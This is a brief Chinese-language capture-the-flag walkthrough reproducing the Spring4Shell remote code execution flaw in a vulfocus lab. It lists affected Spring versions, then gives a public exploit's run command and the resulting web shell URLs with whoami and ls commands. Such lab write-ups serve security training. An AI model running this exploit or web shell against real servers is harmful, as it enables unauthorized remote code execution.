1. 漏洞介绍
Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。
2、受影响版本
- Spring Core <= 5.2.19, <= 5.3.17
- Spring Boot <= 2.6.5
3、利用前提
- JDK 9 及以上版本
- Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本,以及旧版本
- Tomcat服务器
4.漏洞复现
1.打开vulfocus靶场环境,输入访问地址进入之后为以下 ok
2,接下来下载github上的开源exp文件
https://github.com/craig/SpringCore0day
3.下载好之后在下载好的文件内打开终端 输入以上访问地址来检测
python3 exp.py --url http://123.58.236.76:43269/
4.检测发现漏洞存在并附上url地址访问
漏洞存在,shell地址为:http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=whoami
5.访问已经是root权限,flag在tmp文件下
6.直接输入文件下tmp位置即可得到flag
http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=ls%20/tmp
即可通关